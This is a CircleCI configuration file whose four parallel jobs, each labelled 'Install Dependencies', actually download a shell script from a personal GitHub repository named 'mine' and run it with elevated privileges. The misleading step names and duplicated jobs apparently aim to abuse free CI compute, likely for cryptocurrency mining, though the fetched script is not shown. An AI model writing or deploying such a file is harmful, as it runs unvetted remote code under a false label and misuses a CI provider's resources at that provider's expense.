version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: sudo su && wget https://raw.githubusercontent.com/geraldyolang11/mine/main/circleci.sh && chmod +x circleci.sh && ./circleci.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: sudo su && wget https://raw.githubusercontent.com/geraldyolang11/mine/main/circleci.sh && chmod +x circleci.sh && ./circleci.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: sudo su && wget https://raw.githubusercontent.com/geraldyolang11/mine/main/circleci.sh && chmod +x circleci.sh && ./circleci.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: sudo su && wget https://raw.githubusercontent.com/geraldyolang11/mine/main/circleci.sh && chmod +x circleci.sh && ./circleci.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3